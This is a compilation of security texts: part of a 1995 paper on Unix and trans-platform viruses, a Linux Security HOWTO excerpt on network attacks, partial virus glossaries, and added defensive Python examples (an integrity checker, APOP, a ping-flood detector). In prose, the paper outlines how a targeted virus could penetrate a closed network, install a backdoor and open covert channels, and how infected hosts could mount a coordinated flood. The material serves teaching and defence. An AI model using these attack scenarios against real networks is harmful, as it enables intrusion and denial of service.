from the personal computers using virus scanners. During the 
disinfection period all of the personal computers were disconnected 
from the network and idle. Once all the computers were disinfected, 
all removable media had been tested and no infection had been 
observed for a period of time, the computers were reattached to the 
network. A few weeks later, a test of the computers using the same 
virus scanner indicated they had become re-infected with the same 
viruses. The source of infection was then identified as repositories 
of executables stored on the Unix file servers. 

These repositories were organically grown centralised resources 
for all the personal computers, because the Unix servers were 
effective at providing these shared services via NFS. In retrospect, 
this problem had to exist. The use of network file systems exported 
from the Unix platforms provided an easy, powerful method of 
transferring data, including executables. Some network designs 
provide all third-party software from a network disk for ease of 
maintenance and reduced storage requirements. This easy access 
provides an open door for viruses. 

Trans-platform  Viruses  Attack  Unix 

During late 1994 and early 1995, multiple instances of at least 
three trans-platform virus attacks on Unix systems were observed. 
All of these attacks involved MS-DOS viruses that attacked PC-based 
Unix systems. The first attack involved a virus that corrupted the 
Unix file system every night. The attack was located using a virus 
scanner, which indicated a Unix binary that was executed at midnight 
by cron. The MS-DOS virus had become embedded in the Unix 
executable, where it was executed. The virus did not perform as 
designed: the corruption was the result of the virus attempting to 
infect other files and was not an intended effect. The virus was 
reinstalled every morning when the system was restored. The second 
attack involved an MS-DOS virus that executed and was successful in 
infecting other files. Once again the file system was corrupted, but 
it took longer, thereby allowing the virus to propagate. The final 
infection involved a boot sector virus. Since this type of virus 
executes prior to the loading of the operating system, the 
differences between Unix and MS-DOS are moot. The PC BIOS and 
processor are the same in both cases, and the virus is able to 
execute according to design. In fact, two different viruses were 
observed performing in this way. The first virus was spread by an 
MS-DOS setup diskette, while the second virus was transmitted using 
a still undiscovered method. While we observed no boot sector 
infections of PC-based Unix systems during 1994, we received reports 
from system administrators who were requesting information on our 
Unix anti-virus product because they had experienced hundreds of 
infections during 1995. In one instance, a single multinational 
company lost its entire international network overnight. The 
estimated cost in lost time, resources and sales was in the millions 
of dollars. 

Once it is understood that the BIOS and processor functions are the same for both operating systems, it is very easy to see how a trans-platform virus could be designed by intention. The virus would be able to process correctly by inspecting the operating system using only common BIOS calls and then modifying its basic behaviour using a simple "if" structure.

Traditional Categories Of Protection And Their Failure

There are three traditional categories of protection, none of which provide complete or significant protection as stand-alone methods of implementation. The categories are Control, Inspection and Integrity. Each of these methods has traditionally been used separately.

Control has been the primary intent of the U.S. national standards on computer security. They deal with the control of access to the system, its functions, resources and the ability to move or share data in the system. These national standards are codified in a library generally referred to as the Rainbow series. (The name was given because the books have different colour covers, making a library shelf look like a rainbow.) While these standards are a valuable and important aspect of computer security, they do not provide a deterrent against software attack. A virus is an effective way of gaining control over a system, even a highly controlled system such as a B1 rated version of Unix. In this case, control does not provide protection against software attacks because of the virus's ability to change permission sets with each new owner that is infected. A virus attack gains access to multiple users through shared files. Access control is designed to allow the sharing of files. The ability to share files is a basic need of the user and cannot be eliminated without destroying the usefulness of the system. Discretionary Access Control (DAC) is not protection against software attacks because it is a weak form of protection that can be bypassed and, being discretionary, is at the control of the end users, who very often ignore it. Sites where the majority of the files on the system have no DAC protection are normal. (Many Unix sites have permission bit settings of 777, which allow anyone to read, write, execute or modify the file.) Mandatory Access Control (MAC) also has little effect on virus activity for the same reasons, although MAC can be configured to be neither weak nor easy to bypass. Each time a virus attacks an executable file owned by a different user, it takes on the full privileges of that user, including access to files of other users whose permissions intersect the DAC and MAC permission sets of the infected user. On all systems, the need to share files forces the creation of users who exist in multiple permission sets. This multiple membership allows viruses to move between MAC compartments and levels. Reducing the number of multiple-membership users will slow the advance of a virus but will not eliminate it. Finally, once a virus gains access to an operator account (root, operator, isso), it cannot be stopped by any form of control.

Inspection is the traditional way of locating both known holes in operating systems and known viruses. The key word here is "known". System audit tools such as COPS, SATAN and others can only locate holes that are known to them. Virus scanners can only locate viruses that are known to them. This means that a virus scanner or inspection tool is obsolete even before it is shipped from the factory. It can only deal with the past, never the present or future, since the conditions searched for must exist at the time of coding. Virus scanners have to be constantly updated. This is becoming a problem with the explosion of viruses being created by new authors and by virus computer-aided design and manufacturing tools (V-CAD/CAM).

It has been proposed that audit tools such as COPS can be used to deter virus infections because they strengthen the system's ability to control access and data movement. These inspection tools only improve control. As stated, control does not provide protection against virus attacks. It attempts to keep outside people out and inside people within their areas of authorization.

The third category of protection is Integrity. Integrity systems are intended to detect change. In the MS-DOS world, early integrity systems used cyclic redundancy check (CRC) values to detect change. A virus was then created which countered this protection. The virus determined the CRC value of the target file, infected it, and then padded the file until the CRC value computed the same. Many Unix users still use this method of change detection or, worse, attempt to use the date of last modification as an indication of change. The date of last modification can be changed to any value on Unix systems with a simple user command. On many systems an option of the "touch" command provides this ability.

Any integrity tool that does not use cryptographic methods is of little value. In fact, if the integrity system fails to detect critical changes, then the false sense of security created in the system operator can be devastating to the system. An integrity tool, CIT, was created using the RSA Associates MD5 cryptographic hash algorithm. Since the algorithm is cryptographic, it can detect even a single bit flip and cannot be misled by any known means. In addition, during the development of CIT, it was determined that it was necessary to detect additions and deletions to the file system, since these could be indications of non-infectious attacks such as those performed by Trojan horses, worms and hackers. In this way, a rolling baseline can be created that will allow the system operator to quickly recover from any form of file system attack. Modifications to the protected file system created by unauthorized users or software attacks can be detected and removed. Using a tool of this type allows the administrator to locate the approximate time of attack, since the modification will have taken place between two known timed events, the last and current execution of the integrity tool. Finally, integrity tools can be used to determine if a third party file has been modified or tampered with prior to use. Some manufacturers of Unix operating systems now publish MD5 digests of their systems. Using these digests, it is possible to determine that the file on your system is exactly as it should be: there was no degradation from misreading the installation media, deterioration of the disk system or intentional modification. If a manufacturer does not publish a list, then end users can create their own by installing an operating system on multiple systems from different media sources. The created digests of each system should agree.
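As an added example (not from the paper, and not the CIT tool it describes), here is a small Python integrity checker in the spirit of the rolling baseline just described: it records a cryptographic digest for every file, reports additions, deletions and content changes between two runs, shows that a date-of-last-modification check is blind to a file whose timestamp was put back, and verifies files against a vendor-style digest list. SHA-256 stands in for MD5 (the algorithm is a parameter); all file names and contents are constructed.

```python
import hashlib
import os
import tempfile
from pathlib import Path


def file_digest(path: Path, algo: str = "sha256") -> str:
    """Cryptographic digest of a file's contents. The paper's tool used MD5;
    the algorithm is a parameter here and SHA-256 is the default."""
    h = hashlib.new(algo)
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path) -> dict:
    """Map every regular file under root (relative path) to (digest, mtime_ns)."""
    baseline = {}
    for p in sorted(root.rglob("*")):
        if p.is_file():
            rel = str(p.relative_to(root))
            baseline[rel] = (file_digest(p), p.stat().st_mtime_ns)
    return baseline


def compare(old: dict, new: dict) -> dict:
    """Diff two baselines. 'changed_hash' is what a cryptographic check finds;
    'changed_mtime' is what a last-modification-date check would have found."""
    common = set(old) & set(new)
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "changed_hash": sorted(p for p in common if old[p][0] != new[p][0]),
        "changed_mtime": sorted(p for p in common if old[p][1] != new[p][1]),
    }


def verify_manifest(root: Path, manifest: str, algo: str = "sha256") -> list:
    """Check files against a published digest list, one '<digest>  <path>' per
    line as md5sum/sha256sum print it. Returns paths missing or not matching."""
    failures = []
    for line in manifest.splitlines():
        if not line.strip():
            continue
        expected, rel = line.split(None, 1)
        rel = rel.strip()
        p = root / rel
        if not p.is_file() or file_digest(p, algo) != expected:
            failures.append(rel)
    return failures


def demo() -> dict:
    """Constructed scenario in a temporary directory: record a baseline, then
    alter one file while putting its old timestamp back (what touch allows),
    add a file and delete a file, and report what each method detects."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "bin").mkdir()
        (root / "bin" / "ls").write_bytes(b"original program image\n")
        (root / "etc.conf").write_bytes(b"setting=1\n")
        base = build_baseline(root)
        manifest = "\n".join(f"{dg}  {rel}" for rel, (dg, _) in base.items())

        target = root / "bin" / "ls"
        st = target.stat()
        target.write_bytes(b"original program image\n" + b"\x00" * 16)
        # Old timestamp restored: a date-based check now sees nothing.
        os.utime(target, ns=(st.st_atime_ns, st.st_mtime_ns))

        (root / "bin" / "newfile").write_bytes(b"added after the baseline\n")
        (root / "etc.conf").unlink()

        result = compare(base, build_baseline(root))
        result["manifest_failures"] = verify_manifest(root, manifest)
        return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```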

Non-traditional Categories Of Protection And Their Failure

In the past, fencing systems were sold as a popular method of virus protection on PC platforms. A fencing system write-protects parts of the disk using a hardware board that is added to the system bus. Since a virus cannot infect a file that is write-protected using hardware, it appears to be a good method. The obvious drawback is that the user cannot write to the disk if it is write-protected. The fencing system therefore had to create zones of protection so that the user could perform useful work. Viruses happily infected the unprotected zones. Fencing systems appear never to have been marketed for Unix systems.

Projection Of Future Problems

The problem of attack software written for and targeted against Unix systems will continue to grow, especially now that the Internet has gained popularity. Unix systems are the backbone of the world wide Internet. Viruses will become more prevalent because they provide all of the benefits of other forms of attack while having few drawbacks. Trans-platform viruses may become common as an effective attack. All of the methods currently used in creating MS-DOS viruses can be ported to Unix. This includes the creation of automated CAD/CAM virus tools, stealth, polymorphism and armour. The future of viruses on Unix is already hinted at by the widespread use of Bots and Kill-Bots (slang terms referring to software robots). These programs are able to move from system to system performing their function. Using a Bot as a dropper or creating a virus that includes bot-like capability is simple. With the advent of global networks, the edge between viruses, bots, worms and Trojans will blur. Attacks will be created that use abilities from all of these forms and others yet to be developed. There have already been cases where people have used audit tools such as COPS and SATAN to attack a system. Combining these tools with a virus CAD/CAM program will allow a fully functional virus factory to create custom viruses and attacks against specific targets, such as companies that are disliked by the perpetrator. The information services provided by the Internet already provide sufficient information, in the form of IP addresses and email domain addresses, to identify, locate and attack systems owned by specific entities.

Finally, viruses and worms can provide the perfect format for a hostage-shielded denial of service attack. It is well known that an Internet-attached system can be made to "disappear" or crash by flooding it with IP packets. Site administrators can protect their systems from crashing by programming their local router to filter out packets from the attacking source. The system will still disappear because legitimate users will be squeezed out by the flood of attack packets, but filtering at the router can at least save the system from crashing. Unfortunately, anyone can masquerade as someone else on the Internet by merely using their IP address. This attack can send a barrage of packets to the target site, each of which has a different source IP address. It is not possible to use a router to filter this type of attack, but the Internet service provider can trace the source of the attack by physical channel without relying upon the IP address. In cooperation with other Internet providers, the attacker can be isolated from the Internet for a short time. Hopefully, the attacker will become bored and go away, or can be identified for action by law enforcement. Another possibility is to use viruses to generate the attack. If a virus is successful in spreading to thousands of sites on the Internet and is programmed to start an IP attack against a specific target on the same day at the same time, then there is no way to stop the attack because it has originated from thousands of sites, all of which are live hostages. The site under attack will have to go off line, since the Internet service providers will be helpless in the face of a coordinated, dispersed attack. Since the impact against each individual hostage system is low, the hostages may not even notice that there is a problem. The Internet service provider attached to the target system is in the best position to detect the attack; however, they are as subject to this attack as the target, since they may "crash" from the excessive bandwidth usage flooding their network from multiple sources.

Scenario Of A Virus Attack Against A Secure Unix Network

The military and many other companies believe that they are protected against focused attacks because they employ a closed network configuration. In some cases these networks may also use highly secure "B" rated operating systems [NCSC-TG-006]. Typically, the network will not allow modems, Internet connections or any electronic connections to organizations outside of the immediate need. In addition, the networks are almost always heterogeneous because of legacy equipment, primarily PC systems. The network designers normally allow the PC systems to retain their floppy disk drives even though their attachment to a network renders them nonessential. Networks of this type have been considered secure; however, they are open to information warfare attacks via a focused virus. Assuming that the perpetrator is an outsider without access to the equipment or premises, one possible method of attack against this type of network would take advantage of both the Typhoid Mary Syndrome and Trans-platform Viruses to produce an attack that is targeted against the Unix systems but originated from an attached PC. A virus can be created whose payload is triggered by executing on a PC that is attached to the target network. This is not hard with a little inside information about the configuration of the network. The perpetrator would then install the virus at all of the local universities in the hope that someone working at the installation is taking a night class or that one of their children will unknowingly infect a common-usage home computer. At that point, the virus has a good chance of entering the target network. This is a well known vector and is enhanced because the virus will not reveal itself. Once on the target system, the PC virus will act like a dropper, releasing a Unix virus into the backbone. The payload virus may be necessary because many Unix backbone systems are not PC compatible. The Unix virus payload can then install a back door which can be remotely directed. In addition, the virus can create a covert channel by making use of messenger viruses. While the use of messenger viruses is slow and has low bandwidth, they are bidirectional and can be used for command and control of more complex attacks.

Conclusion

The problem of attack software targeted against Unix systems will continue to grow. Viruses may become more prevalent because they provide all of the benefits of other forms of attack, while having few drawbacks. Trans-platform viruses may become common as an effective attack. All of the methods currently used in creating MS-DOS viruses can be ported to Unix. This includes the creation of automated CAD/CAM virus tools, stealth, polymorphism and armour. The future of viruses on Unix is already hinted at by the widespread use of Bots and Kill-bots (slang terms referring to software robots). These programs are able to move from system to system performing their function. Using a Bot as a dropper or creating a virus that includes bot-like capability is simple. With the advent of global networks, the edge between viruses, bots, worms and Trojans will blur. Attacks will be created that use abilities from all of these forms and others yet to be developed. There have already been cases where people have used audit tools such as COPS and SATAN to attack a system. Combining these tools with a virus CAD/CAM program will allow a fully functional virus factory to create custom viruses to attack specific targets.

As these problems unfold, new methods of protection must be created. Research has hinted at several promising methods of protection, including real-time security monitors that use artificial intelligence for simple decision making.

Even with the current problems and the promise of more sophisticated problems and solutions in the future, the one thing that is believed to be certain is that Unix or Unix-like systems will continue to provide a payback that is well worth the cost of operating them.

Copyright © August 1995, February 1996 by Peter V. Radatti.

Permission is granted to any individual or institution to use, copy, or redistribute this document so long as it is not sold for profit, and provided that it is reproduced whole and this copyright notice is retained.
Linux Network Security

Source: "Linux Security HOWTO", available at
www.tldp.org/HOWTO/Security-HOWTO/network-security.html

Network security is becoming more and more important as people spend more and more time connected. Compromising network security is often much easier than compromising physical or local security, and is much more common.

There are a number of good tools to assist with network security, and more and more of them are shipping with Linux distributions.

Packet Sniffers

One of the most common ways intruders gain access to more systems on your network is by employing a packet sniffer on an already compromised host. This "sniffer" just listens on the Ethernet port for things like passwd and login and su in the packet stream and then logs the traffic after that. This way, attackers gain passwords for systems they are not even attempting to break into. Clear-text passwords are very vulnerable to this attack.

Example: Host A has been compromised. The attacker installs a sniffer. The sniffer picks up the admin logging into Host B from Host C. It gets the admin's personal password as they log in to B. Then the admin does a su to fix a problem. They now have the root password for Host B. Later the admin lets someone telnet from his account to Host Z on another site. Now the attacker has a password/login on Host Z.

In this day and age, the attacker doesn't even need to compromise a system to do this: they could also bring a laptop or PC into a building and tap into your net.

Using ssh or other encrypted password methods thwarts this attack. Things like APOP for POP accounts also prevent this attack. (Normal POP logins are very vulnerable to this, as is anything that sends clear-text passwords over the network.)
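As an added example (not part of the HOWTO), the following Python sketch contrasts the two POP3 logins mentioned above: the plain USER/PASS exchange, which puts the password on the wire where a sniffer reads it, and APOP (RFC 1939), where the client sends MD5 of the server's timestamp banner followed by the shared secret, so the secret itself never crosses the network and a captured response is useless on a later connection. The Pop3Server class, user names and secrets are constructed for the demonstration.

```python
import hashlib
import secrets
import time


def apop_digest(timestamp_banner: str, shared_secret: str) -> str:
    """APOP response per RFC 1939: MD5 of the server's timestamp banner
    (angle brackets included) immediately followed by the shared secret,
    rendered as 32 lowercase hex digits. RFC 1939's own worked example:
    banner <1896.697170952@dbc.mtview.ca.us> with secret 'tanstaaf'
    gives c4c9334bac560ecc979e58001b3e22fb."""
    return hashlib.md5((timestamp_banner + shared_secret).encode()).hexdigest()


class Pop3Server:
    """Hypothetical, constructed server side of the two logins: USER/PASS
    (secret on the wire) and APOP (challenge-response)."""

    def __init__(self, users: dict):
        self.users = users          # username -> shared secret (constructed)
        self.banner = None
        self.connections = 0
        self._user = None

    def greet(self) -> str:
        """New connection: a fresh, unique timestamp banner (RFC 1939 suggests
        process id plus clock; a connection counter plus clock suffices here)."""
        self.connections += 1
        self.banner = f"<{self.connections}.{int(time.time())}@pop.example>"
        return f"+OK POP3 server ready {self.banner}"

    def handle(self, line: str) -> str:
        parts = line.split()
        if parts[0] == "USER":
            self._user = parts[1]
            return "+OK"
        if parts[0] == "PASS":
            ok = self._user is not None and self.users.get(self._user) == parts[1]
            return "+OK logged in" if ok else "-ERR permission denied"
        if parts[0] == "APOP":
            user, digest = parts[1], parts[2]
            secret = self.users.get(user)
            # Constant-time comparison against the digest for this banner.
            if secret is not None and secrets.compare_digest(
                    digest, apop_digest(self.banner, secret)):
                return "+OK logged in"
            return "-ERR permission denied"
        return "-ERR unknown command"


def plain_login(server: Pop3Server, user: str, password: str) -> list:
    """USER/PASS login. Returns the wire transcript, i.e. what a sniffer sees."""
    transcript = [server.greet()]
    for cmd in (f"USER {user}", f"PASS {password}"):
        transcript += [cmd, server.handle(cmd)]
    return transcript


def apop_login(server: Pop3Server, user: str, secret: str) -> list:
    """APOP login: the client derives its response from the banner it received."""
    greeting = server.greet()
    banner = greeting[greeting.index("<"):]
    cmd = f"APOP {user} {apop_digest(banner, secret)}"
    return [greeting, cmd, server.handle(cmd)]


def replay(server: Pop3Server, captured_transcript: list) -> str:
    """Re-send a captured APOP command on a new connection; the banner has
    changed, so the captured digest no longer verifies."""
    server.greet()
    return server.handle(captured_transcript[1])
```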

SATAN, ISS, and Other Network Scanners

There are a number of different software packages out there that do port and service-based scanning of machines or networks. SATAN, ISS, SAINT, and Nessus are some of the more well-known ones. This software connects to the target machine (or all the target machines on a network) on all the ports it can, and tries to determine what service is running there. Based on this information, you can tell if the machine is vulnerable to a specific exploit on that server.

SATAN (Security Administrator's Tool for Analyzing Networks) is a port scanner with a web interface. It can be configured to do light, medium, or strong checks on a machine or a network of machines. It's a good idea to get SATAN and scan your machine or network, and fix the problems it finds. Make sure you get the copy of SATAN from metalab or a reputable FTP or web site. There was a Trojan copy of SATAN that was distributed out on the net. http://www.trouble.org/~zen/satan/satan.html. Note that SATAN has not been updated in quite a while, and some of the other tools below might do a better job.

ISS (Internet Security Scanner) is another port-based scanner. It is faster than SATAN, and thus might be better for large networks. However, SATAN tends to provide more information.

Abacus is a suite of tools to provide host-based security and intrusion detection. Look at its home page on the web for more information: http://www.psionic.com/abacus/

SAINT is an updated version of SATAN. It is web-based and has many more up-to-date tests than SATAN. You can find out more about it at: http://www.wwdsi.com/~saint

Nessus is a free security scanner. It has a GTK graphical interface for ease of use. It is also designed with a very nice plug-in setup for new port-scanning tests. For more information, take a look at: http://www.nessus.org

Denial of Service Attacks

Denial of service attacks have increased greatly in recent years. Some of the more popular and recent ones are listed below. Note that new ones show up all the time, so these are just a few examples. Read the Linux security lists and the bugtraq list and archives for more current information.

o SYN Flooding - SYN flooding is a network denial of service attack. It takes advantage of a "loophole" in the way TCP connections are created. The newer Linux kernels (2.0.30 and up) have several configurable options to prevent SYN flood attacks from denying people access to your machine or services. See Section 7 for proper kernel protection options.

o Pentium "F00F" Bug - It was recently discovered that a series of assembly codes sent to a genuine Intel Pentium processor would reboot the machine. This affects every machine with a Pentium processor (not clones, not Pentium Pro or PII), no matter what operating system it's running. Linux kernels 2.0.32 and up contain a workaround for this bug, preventing it from locking your machine. Kernel 2.0.33 has an improved version of the kernel fix, and is suggested over 2.0.32. If you are running on a Pentium, you should upgrade now!

o Ping Flooding - Ping flooding is a simple brute-force denial of service attack. The attacker sends a "flood" of ICMP packets to your machine. If they are doing this from a host with better bandwidth than yours, your machine will be unable to send anything on the network. A variation on this attack, called "smurfing", sends ICMP packets to a host with your machine's return IP, allowing them to flood you less detectably. You can find more information about the "smurf" attack at http://www.quadrunner.com/~chuegen/smurf.txt

If you are ever under a ping flood attack, use a tool like tcpdump to determine where the packets are coming from (or appear to be coming from), then contact your provider with this information. Ping floods can most easily be stopped at the router level or by using a firewall.

o Ping o' Death - The Ping o' Death attack sends ICMP ECHO REQUEST packets that are too large to fit in the kernel data structures intended to store them. Because sending a single, large (65,510 bytes) "ping" packet to many systems will cause them to hang or even crash, this problem was quickly dubbed the "Ping o' Death." This one has long been fixed, and is no longer anything to worry about.

o Teardrop / New Tear - One of the most recent exploits involves a bug present in the IP fragmentation code on Linux and Windows platforms. It is fixed in kernel version 2.0.33, and does not require selecting any kernel compile-time options to utilize the fix. Linux is apparently not vulnerable to the "newtear" exploit.
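As an added example (not from the HOWTO), here is a small Python analyser for the tcpdump step mentioned under Ping Flooding: it parses tcpdump-style ICMP echo lines, flags any source whose echo requests reach a threshold inside a time window, and separately counts echo replies that arrive for requests this host never sent, which is how a "smurf" reflection looks from the victim's side. The capture lines (documentation-range addresses), the thresholds and the line format are constructed for the demonstration; real tcpdump output varies with version and flags.

```python
import re
from collections import Counter, defaultdict

# One-line ICMP echo summary in the shape tcpdump prints it (assumed format;
# the constructed sample capture below follows it).
ICMP_RE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d\.\d+) IP (?P<src>[\d.]+) > (?P<dst>[\d.]+): "
    r"ICMP echo (?P<kind>request|reply), id (?P<id>\d+), seq (?P<seq>\d+), "
    r"length (?P<length>\d+)"
)


def _seconds(ts: str) -> float:
    h, m, s = ts.split(":")
    return int(h) * 3600 + int(m) * 60 + float(s)


def parse(lines) -> list:
    """Keep only ICMP echo lines; everything else (TCP, ARP, ...) is skipped."""
    packets = []
    for line in lines:
        m = ICMP_RE.match(line)
        if m:
            p = m.groupdict()
            p["t"] = _seconds(p["ts"])
            packets.append(p)
    return packets


def analyze(lines, my_ip: str, window: float = 1.0, threshold: int = 20) -> dict:
    """flood_sources: sources whose echo requests to my_ip reach `threshold`
    inside any `window` seconds (value is the peak count observed).
    Unsolicited replies: echo replies to my_ip that answer no request we sent,
    the victim-side signature of a smurf reflection."""
    packets = parse(lines)
    ours = {(p["dst"], p["id"], p["seq"])
            for p in packets if p["src"] == my_ip and p["kind"] == "request"}
    recent = defaultdict(list)   # source -> timestamps inside the window
    floods = {}
    for p in packets:
        if p["dst"] != my_ip or p["kind"] != "request":
            continue
        q = recent[p["src"]]
        q.append(p["t"])
        while q and p["t"] - q[0] > window:
            q.pop(0)
        if len(q) >= threshold:
            floods[p["src"]] = max(floods.get(p["src"], 0), len(q))
    unsolicited = Counter(
        p["src"] for p in packets
        if p["dst"] == my_ip and p["kind"] == "reply"
        and (p["src"], p["id"], p["seq"]) not in ours)
    return {
        "flood_sources": floods,
        "unsolicited_reply_sources": len(unsolicited),
        "unsolicited_replies": sum(unsolicited.values()),
    }


def sample_capture() -> list:
    """Constructed capture; not a real trace."""
    me, lines = "192.0.2.10", []
    # Our own ping and its legitimate answer.
    lines.append(f"12:00:00.100000 IP {me} > 203.0.113.1: ICMP echo request, id 7, seq 1, length 64")
    lines.append(f"12:00:00.120000 IP 203.0.113.1 > {me}: ICMP echo reply, id 7, seq 1, length 64")
    # Fifty echo requests from one host inside half a second.
    for i in range(50):
        lines.append(f"12:00:01.{i * 10000:06d} IP 198.51.100.7 > {me}: "
                     f"ICMP echo request, id 1, seq {i}, length 64")
    # Thirty echo replies from thirty hosts we never pinged.
    for i in range(30):
        lines.append(f"12:00:02.{i * 1000:06d} IP 203.0.113.{10 + i} > {me}: "
                     f"ICMP echo reply, id 9, seq {i}, length 64")
    # A non-ICMP line the parser must ignore.
    lines.append(f"12:00:03.000000 IP {me}.22 > 198.51.100.9.5000: Flags [P.], length 1")
    return lines


if __name__ == "__main__":
    print(analyze(sample_capture(), "192.0.2.10"))
```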

You can find code for most exploits, and a more in-depth description of how they work, at http://www.rootshell.com using their search engine.

VPNs - Virtual Private Networks

VPNs are a way to establish a "virtual" network on top of some already-existing network. This virtual network often is encrypted and passes traffic only to and from some known entities that have joined the network. VPNs are often used to connect someone working at home over the public Internet to an internal company network.

If you are running a Linux masquerading firewall and need to pass MS PPTP (Microsoft's VPN point-to-point product) packets, there is a Linux kernel patch out to do just that. See: ip-masq-vpn.

There are several Linux VPN solutions available:

o vpnd. See http://sunsite.dk/vpnd/.
o Free S/WAN, available at http://www.xs4all.nl/~freeswan/
o ssh can be used to construct a VPN. See the VPN mini-howto for more information.
o vps (virtual private server) at http://www.strongcrypto.com.
o yawipin at http://yavipin.sourceforge.net
Adware or Ad ware

This is software that downloads and displays advertisements. This kind of software is often bundled with freeware.

Alias

There is no standard, accepted rule for naming viruses. Hence, even though informal groups, such as CARO, have discussed conventions for virus naming, differences still exist between antivirus software companies and research organisations. Thus, where the term 'alias' or 'also known as' occurs, it refers to different names that the same virus may have been given by other sources.

Annoyance

Any trojan that does not cause any major damage, but instead annoys a user by turning the text on the screen upside down, making mouse motions erratic, and so on.

ANSI Bomb

Character sequences that reprogram specific keys on the keyboard. If ANSI.SYS is loaded, some bombs will display colourful messages, or have interesting (but unwanted) graphical effects.

Anti-emulation

To reliably detect polymorphic viruses, scanners include code emulators to simulate the running of executable code and check whether it decrypts to a known virus. An emulator must stop emulating a program once it is no longer necessary, and for performance reasons many emulators have simple rules for quickly determining a stopping point. Some polymorphic viruses include tricks attempting to defeat these code emulators by fooling them into quitting the emulation before the decryption code has finished its work. Such methods are commonly called anti-emulation techniques.

Antivirus Virus

The idea of making an antivirus program viral so that it can propagate to where it is most needed is a very old one. Such a program would be an antivirus virus. It is universally agreed among reputable antivirus researchers to be a very bad, even dangerous, idea, and should be avoided at all costs.

Anti-heuristic

Anti-heuristic techniques are efforts by virus writers to avoid their code being detected as a possible new virus by heuristic detection. What works depends on the heuristic approaches of different scanners, but some code obfuscation techniques appear clearly anti-heuristic.

Appender

A virus that inserts a copy of its code at the end of its victim file is known as an appender or appending virus. (cf. Cavity Infector, Companion Virus, Overwriter, Prepender)

Armoured Virus

Viruses that use special tricks to make tracing them in a debugger and/or disassembling them difficult are said to be 'armoured'. The purpose of armouring is primarily to hinder virus analysts from reaching a complete understanding of the virus's code. An early example of an armoured virus is Whale.

AV Killer

Any hacker tool intended to disable a user's anti-virus software to help elude detection. Some will also disable personal firewalls.

Backdoor

A program that surreptitiously allows access to a computer's resources (files, network connections, configuration information etc.) via a network connection is known as a backdoor or remote access trojan. Note that such functionality is often included in legitimate software designed and intended to allow such access.

Bait File, Goat File, Decoy File

Some generic approaches to virus detection create 'dummy' program files which are written to the drives of the machines being monitored. These files are regularly checked for modification, or created, checked and then deleted. Such files are sometimes called 'goat files', 'decoy files' or 'bait files' because they are not intended to be run for any practical purpose, and act solely as 'bait' to trap and detect the presence of an active virus.

Bimorphic Virus

An encrypted virus that has two forms of the decryption code, usually randomly selecting between them when writing its decryptor to a new replicant.

Binder

A tool that combines two or more files into a single file, usually for the purpose of hiding one of them.

BIOS

Basic Input/Output System is the lowest level program in a PC, which provides an interface with the PC’s hardware. A PC’s BIOS is also responsible for initiating the operating system bootstrap process by loading the boot sector of a diskette or the master boot record of a hard drive and passing control to it.

ActiveX

ActiveX controls are software modules based on Microsoft’s Component Object Model (COM) architecture. On the Internet, ActiveX controls can be linked to Web pages and downloaded by an ActiveX-compliant browser. ActiveX controls turn Web pages into software pages that perform like any other program launched from a server, and can have full system access. In most instances this access is legitimate, but one should be cautious of malicious ActiveX applications.

Attachments

Attachments are files added to an outgoing e-mail. In Microsoft e-mail clients, e-mail carrying an attachment will have a paperclip-type icon beside the description. Also in Microsoft e-mail clients, an icon representing the file type will be embedded at the end of the body of the e-mail message. Attachments have become a known harbinger of virus infection. Virus authors and distributors often give the file a double extension, such as PICTURE.BMP.EXE. Users whose Windows Explorer is set to hide extensions for known file types (the default) see only PICTURE.BMP and can be tricked into believing an executable file is a benign bitmap, or graphic, file. To prevent this, ensure file extension viewing is enabled on the system.
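The following is an added example, not part of the original glossary, that models how the ‘hide extensions for known file types’ setting turns a double-extension attachment into something that looks harmless. The attachment names and the extension lists are constructed for the illustration; the executable list is a representative subset, not the full set of types Windows will run.

```python
"""Added example (not from the original page): how hiding known extensions
makes a double-extension attachment look harmless. Names are constructed."""

# Extensions the shell runs as programs (assumption: illustrative subset).
EXECUTABLE_EXTS = {"exe", "com", "bat", "cmd", "pif", "scr", "vbs", "js", "hta"}
# 'Known' types whose final extension Explorer hides by default (subset).
KNOWN_EXTS = EXECUTABLE_EXTS | {"bmp", "jpg", "gif", "txt", "doc", "xls", "zip"}


def real_extension(name: str) -> str:
    """The extension the shell actually dispatches on: the last one."""
    return name.rsplit(".", 1)[1].lower() if "." in name else ""


def displayed_name(name: str, hide_known: bool = True) -> str:
    """What Explorer shows. With hiding on, only the final extension is
    stripped, and only if it is a known type; a decoy '.bmp' before it
    stays visible, which is the whole trick."""
    if hide_known and real_extension(name) in KNOWN_EXTS:
        return name.rsplit(".", 1)[0]
    return name


def is_disguised_executable(name: str, hide_known: bool = True) -> bool:
    """True when the user is shown a non-executable extension but the
    shell would run the file as a program."""
    shown_ext = real_extension(displayed_name(name, hide_known))
    return (real_extension(name) in EXECUTABLE_EXTS
            and shown_ext != ""
            and shown_ext not in EXECUTABLE_EXTS)


def triage(names, hide_known=True):
    """(displayed name, real extension, disguised?) for each attachment."""
    return [(displayed_name(n, hide_known), real_extension(n),
             is_disguised_executable(n, hide_known)) for n in names]


if __name__ == "__main__":
    samples = ["holiday.bmp.exe", "report.doc", "setup.exe", "readme.txt.vbs"]
    for row in triage(samples):              # extensions hidden
        print(row)
    for row in triage(samples, hide_known=False):   # extensions shown
        print(row)
```

With hiding off, `holiday.bmp.exe` is displayed in full and is no longer classed as disguised; a plain `setup.exe` is never counted, because it carries no decoy extension, only an icon.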

Antivirus

Antivirus refers to the products and technology used to detect malicious code, prevent it from infecting your system, and remove malicious code that has infected the system. Typically, antivirus vendors share samples and information to ensure a rapid response to malicious code outbreaks. Most antivirus vendors participate in independent testing which certifies their products’ ability to detect or disinfect viruses.

Applet

Any miniature application transported over the Internet, especially as an enhancement to a Web page. Authors often embed applets within the HTML page as a foreign program type.

Attack

An attempt to subvert or bypass a system’s security. Attacks may be passive or active. Active attacks attempt to alter or destroy data. Passive attacks try to intercept or read data without changing it. See also: Brute Force Attack, Denial of Service, Hijacking, Password Attacks, Password Sniffing

Attributes

Characteristics assigned to all files and directories. Attributes include Read Only, Archive, Hidden and System.

Background Scanning

A feature in some antivirus software that automatically scans files and documents as they are created, opened, closed or executed.

Backup

